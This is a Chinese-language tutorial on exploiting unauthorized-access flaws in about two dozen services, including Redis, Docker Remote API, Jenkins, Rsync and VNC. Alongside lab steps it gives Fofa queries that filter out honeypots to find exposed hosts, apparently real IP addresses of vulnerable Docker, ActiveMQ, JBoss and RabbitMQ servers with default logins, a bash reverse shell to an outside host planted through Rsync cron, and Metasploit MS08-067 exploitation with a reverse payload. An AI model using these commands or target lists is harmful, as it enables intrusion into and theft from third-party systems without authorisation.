Bootstrap

未访问授权的漏洞

一、Redis未授权访问漏洞

第一步:进入vulhub目录使用以下命令启动靶机

进⼊⽬录:cd /vulhub-master/redis/4-unacc
启动:docker-compose up -d
检查:docker ps

第二步:在Kali上安装redis程序进⾏服务的链接

#安装redis
apt-get install redis
#redis链接
redis-cli -h 124.221.58.83 -p 6379
#redis常⻅命令
(1)查看信息:info
(2)删除所有数据库内容:flushall
(3)刷新数据库:flushdb
(4)看所有键:KEYS *,使⽤select num可以查看键值数据。
(5)设置变量:set test "whoami"
(6)config set dir dirpath 设置路径等配置
(7)config get dir/dbfilename 获取路径及数据配置信息
(8)save保存
(9)get 变量,查看变量名称

第三步:可以直接连接执⾏命令且不需要认证说明存在未授权访问漏洞....下载以下攻击项⽬

git clone https://github.com/n0b0dyCN/redis-rogue-server

第四步:使⽤⼯具执⾏以下命令获取⽬标的命令执⾏环境,交互时输⼊ i 键会获取Shell环境

python3 redis-rogue-server.py --rhost 124.221.58.83 --lhost 124.221.58.83

第一次开启环境可能会报错 再执行一次就可以成功进入

i是正向反弹 r是

二、MongoDB未授权访问漏洞

步骤⼀:在云服务器上执行以下命令搭建起MongoDB的漏洞环境..

拉取镜像:docker pull mongo
启动容器:docker run -d -p 27017:27017 --name mongodb mongo
查看容器:docker ps -a

步骤⼆:使⽤Nmap的插件脚本进⾏扫描...发现存在未授权访问漏洞.

nmap -p 27017 --script mongodb-info 8.155.7.173

步骤三:也可尝试使⽤MSF中的模块进⾏漏洞测试....不需要认证即可直接连接...

use auxiliary/scanner/mongodb/mongodb_login
show options
set rhosts 172.16.3.243
set threads 15
exploit

步骤四:即存在未授权访问漏洞使⽤Navicat进⾏连接...

三、Memcached未未授权访问漏洞

步骤⼀:下载Memcached程序并执⾏以下命令..启动Memcached漏洞环境

#Memcached程序下载
https://www.runoob.com/memcached/window-install-memcached.html
#执⾏命令
memcached.exe -d install
memcached.exe -d start

要使用管理员身份运行cmd

步骤⼆:使⽤Telnet程序探测⽬标的11211端⼝...

#Telnet探测
telnet 172.16.3.243 11211
#操作命令
stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 39 0 //获得缓存key
get :state:264861539228401373:261588 //通过key读取相应value获得实际缓存内容,造成敏感信息泄露

步骤三:使⽤Nmap程序的脚本进⾏漏洞扫描....

nmap -p 11211 --script memcached-info 172.16.3.243

四、Zookeeper未授权访问漏洞

步骤⼀:使⽤以下Fofa语法搜索资产信息....

port="2181" && "Zookeeper" && country="US"

步骤⼆:在Kali中使⽤以下命令进⾏未授权访问漏洞测试

echo envi | nc ip 35.162.110.1 2181

步骤三:可使⽤Zookeeper可视化管理⼯具进⾏连接....

#⼯具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

五、Jenkins未授权访问漏洞

步骤⼀:使⽤以下fofa语法进⾏产品搜索..

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

步骤⼆:在打开的URL中...点击 Manage Jenkins --> Scritp Console 在执⾏以下命令...

#执⾏命令
println "whoami" .execute().text

六、Jupyter NoteBook未授权访问漏洞

步骤⼀:通过以下fofa语法进⾏产品搜索....或使⽤vulhub启动靶场.

#fofa语法
"Jupyter Notebook" && port="8888" && "terminals"
#vulhub靶场
cd /vulhub/jupyter/notebook-rce
docker-compose up -d

步骤⼆:如果存在未授权访问漏洞则直接访问 http://IP:8888 会直接跳到web管理界⾯,不需要 输⼊密码。

步骤三:从 New -> Terminal 新建⼀个终端,通过新建的终端可执⾏任意命令

七、Elasticsearch未授权访问漏洞

步骤⼀:使⽤以下Fofa语法进⾏Elasticsearch产品搜索...

"Elasticsearch" && port="9200"

步骤⼆:存在未授权访问则直接进⼊到信息⻚⾯....不需要输⼊⽤户密码登陆

步骤三:可按照上⾯查看节点信息等

http://121.37.170.50:9200/version

八、Kibana未授权访问漏洞

步骤⼀:使⽤以下Fofa语句搜索Kibana产品...并打开⻚⾯

"kibana" && port="5601"

步骤⼆:直接访问Kibana的⻚⾯且⽆需账号密码可以登陆进⼊界⾯

九、Docker Remote API未授权访问漏洞

步骤⼀:使⽤以下Fofa语句对Docker产品进⾏搜索

port="2375" && "docker"

步骤⼆:直接使⽤浏览器访问以下路径...

apt install docker-cli

http://ip:2375/version #查看版本信息
http://ip:2375/info #查看容器信息
#eg
http://35.86.135.136:2375/info
http://47.121.212.195:2375/info

步骤三:使⽤-H参数连接⽬标主机的docker,使⽤ps命令查询⽬标系统运⾏的镜像

docker -H tcp://130.61.230.9:2375 ps
docker -H tcp://130.61.230.9:2375 version
docker -H tcp://130.61.230.9:2375 exec -it 1f4 /bin/bash
操作思路:
docker pull 下载有Docker逃逸的容器下来
docker逃逸间接获取安装docker主机控制权限

十、Kubernetes Api Server未授权访问漏洞

步骤⼀:使⽤以下Fofa语法搜索Kubernetes产品....

port="8080" && app="Kubernetes"

步骤⼆:在打开的⽹⻚中直接访问 8080 端⼝会返回可⽤的 API 列表

十一、Hadoop未授权访问漏洞

步骤⼀:使⽤以下FoFA语法进⾏Hadoop产品的搜索

port="8088" && app="Hadoop"

步骤⼆:开启⻚⾯直接访问不经过⽤户密码验证....

十二、ActiveMQ未授权访问漏洞

步骤⼀:使⽤以下Fofa语法搜索产品...

body="ActiveMQ" && port="8161"

步骤⼆:ActiveMQ默认使⽤8161端⼝,默认⽤户名和密码是 admin/admin ,在打开的⻚⾯输⼊

#⽤户登陆
http://43.255.231.186:8161/admin/
http://47.104.74.168:8161/admin/
http://123.60.156.191:8161/admin/

admin admin 登录成功

十三、RabbitMQ未授权访问漏洞

步骤⼀:使⽤以下Fofa语法对RabbitMQ产品进⾏搜索...

port="15672" 
port="15692" 
port="25672"

步骤⼆:在打开的⻚⾯中可输⼊默认的账号和密码进⾏登陆

默认账号密码都是guest
http://x.x.x.x:15672
http://x.x.x.x:25672
http://x.x.x.x:15692
#eg
http://bzgx.yuyiying.com:15672/
http://47.94.4.84:15672
https://114.119.175.25:25672/#/

十四、Springboot Actuator未授权访问漏洞

步骤⼀:使⽤以下Fofa语句搜索资产并打开⻚⾯访问

#Fofa语法
icon_hash="116323821"
#eg
http://2.sureyong.com:9999/#/

步骤⼆:当 web 应⽤程序出现 4xx、5xx 错误时显示类似以下⻚⾯就能确定当前 web 应⽤是使⽤了

springboot 框架....

步骤三:拼接以下路径查看泄露的数据..

访问/trace端点获取基本的 HTTP 请求跟踪信息(时间戳、HTTP 头等),如果存在登录⽤户的操作
请求,可以伪造cookie进⾏登录。
访问/env端点获取全部环境属性,由于 actuator 会监控站点 mysql、mangodb 之类的数据库服
务,所以通过监控信息有时可以mysql、mangodb 数据库信息,如果数据库正好开放在公⽹,那么造
成的危害是巨⼤的。
git 项⽬地址泄露,这个⼀般是在/health 路径,⽐如如下站点,访问其 health 路径可探测到站
点 git 项⽬地址。

十五、FTP未授权访问漏洞(匿名登陆)

步骤⼀:对⽬标环境在资源管理器中⽤以下格式访问...如果该服务器开启了匿名登陆,则可直接进⾏内容查看

ftp://ip:port/

步骤二:本机开启ftp匿名访问前后对比

开启前

开启后

十六、JBoss未授权访问漏洞 *

步骤⼀:使⽤以下语法搜索Jboss产品并打开其⻚⾯....

title="Welcome to JBoss"

步骤⼆:拼接以下路径且⽆需认证直接进⼊控制⻚⾯

#拼接路径
http://ip:port/jmx-console/
#eg
http://177.67.128.116//jmx-console/
http://117.193.144.108:8080/jmx-console/
http://119.8.196.187:8080/jmx-console/

admin admin弱密码登录

十七、Ldap未授权访问漏洞

步骤⼀:使⽤以下Fofa语法搜索使⽤ldap服务的产品....并通过Ldapadmin可视化⼯具做连接验证

#Fofa语法
port="389"
#Ldapadmin⼯具
http://www.ldapadmin.org/download/index.html
https://sourceforge.net/projects/ldapadmin/

步骤⼆:启动⼯具并测试存在未授权的LDAP服务...成功如下

步骤三:连接⽬标LDAP服务并查看其内容

十八、Rsync未授权访问漏洞 *

步骤⼀:在 fofa 中搜索该资产语法如下并在Vulhub中开启靶场!!!

# Fofa语法
(port="873") && (is_honeypot=false && is_fraud=false)
# 启动靶场
cd vulhub/rsync/common
docker-compose up -d

步骤⼆:可使⽤Nmap扫描该端⼝是否开启服务,还可以使⽤Metasploit中关于允许匿名访问的rsync 扫描模块进⾏探测...

# nmap命令
nmap -p 873 --script rsync-list-modules ipaddress
# Metasploit模块
auxiliary/scanner/rsync/modules_list

步骤三:使⽤命令进⾏链接并读取⽂件....

rsync rsync://124.221.58.83:873/
rsync rsync://124.221.58.83:873/src/

步骤四:对系统中的敏感⽂件下载操作.... /etc/passwd

rsync rsync://8.155.7.133:873/src/etc/passwd 
rsync rsync://8.155.7.133:873/src/etc/passwd /var/www/html

步骤五:上传⽂件...如果有相应的jsp/asp/php环境可以写⼀句话以phpinfo为例...

echo "1" >1.txt
ls
rsync ./1.txt rsync://8.155.7.133:873/src/  
rsync rsync://8.155.7.133:873/src/

步骤六:反弹shell...在此可利⽤定时任务cron来反弹获取shell

查看定时任务
rsync rsync://8.155.7.133/src/etc/crontab
将定时任务下载下来
rsync rsync://8.155.7.133/src/etc/crontab /var/www/html

创建shell文件
echo 1>1.txt
  
vim 1.txt
  
#!/bin/bash
/bin/bash -i >& /dev/tcp/114.132.92.17/8888 0>&1

mv 1.txt shell
cat shell
授权shell文件
chmod 777 shell
上传shell 至靶机
rsync -av ./shell rsync://8.155.7.133:873/src/etc/cron.hourly
攻击机开启nc监听响应端口

下载的定时任务文件

创建shell文件

上传shell至靶机

攻击机开启nc监听

十九、VNC未授权访问漏洞

步骤⼀:使⽤以下语句在Fofa上进⾏资产收集

(port="5900") && (is_honeypot=false && is_fraud=false)

步骤⼆:可通过MSF中的模块进⾏检测与漏洞利⽤

# VNC未授权检测
msf6 > use auxiliary/scanner/vnc/vnc_none_auth
msf6 auxiliary(scanner/vnc/vnc_none_auth) > show options
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhosts 172.16.1.1-254
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100
msf6 auxiliary(scanner/vnc/vnc_none_auth) > run
# VNC密码爆破
msf6 > use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > set rhosts 172.16.1.200
msf6 auxiliary(scanner/vnc/vnc_login) > set blank_passwords true //弱密码爆
破
msf6 auxiliary(scanner/vnc/vnc_login) > run
# 加载攻击模块
msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/ms08_0
67_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterprete
r/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 172.16.1.200
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 172.16.1.10
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
获取会话后,直接run vnc可控制远程虚拟机
# 直接控制远程机器
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/vncinject/reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.16.1.200
msf6 exploit(multi/handler) > set lport 4466
msf6 exploit(multi/handler) > exploit

步骤三:VNC链接验证

vncviewer ipaddress

二十、Dubbo未授权访问漏洞

步骤⼀:使⽤以下语句在Fofa上进⾏资产收集

(app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)

步骤⼆:使⽤Telnet程序直接进⾏链接测试

telent IP port

二十一、NSF共享⽬录未授权访问

步骤⼀:使⽤以下语句在Fofa上进⾏资产收集

"nfs"

步骤⼆:执⾏命令进⾏漏洞复现

#安装nfs客户端
apt install nfs-common
#查看nfs服务器上的共享⽬录
showmount -e 192.168.126.130
#挂载相应共享⽬录到本地
mount -t nfs 192.168.126.130:/grdata /mnt
#卸载⽬录
umount /mnt

二十二、Druid未授权访问漏洞

步骤⼀:使⽤以下语句在Fofa与Google上进⾏资产收集....

# Fofa
title="Druid Stat Index"
# PHPINFO⻚⾯
inurl:phpinfo.php intitle:phpinfo()
info.php test.php
 
# Druid未授权访问
inurl:"druid/index.html" intitle:"Druid Stat Index"

步骤⼆:对访问到的站点查看

步骤三:Druid批量扫描脚本...

https://github.com/MzzdToT/CVE-2021-34045

二十三、CouchDB未授权访问

步骤⼀:使⽤以下语句在Fofa上进⾏资产收集....或开启Vulhub靶场进⾏操作

# 搜索语法
(port="5984") && (is_honeypot=false && is_fraud=false)
# Vulhub靶场
cd /vulhub/couchdb/CVE-2017-12636
docker-compose up -d

步骤⼆:执⾏未授权访问测试命令

curl 192.168.1.4:5984
curl 192.168.1.4:5984/_config

步骤三:反弹Shell参考

https://blog.csdn.net/qq_45746681/article/details/108933389

二十四、RTSP未授权访问漏洞

步骤⼀:使⽤以下语句在Fofa上进⾏资产收集

(port="554") && (is_honeypot=false && is_fraud=false) && protocol="rtsp" 

;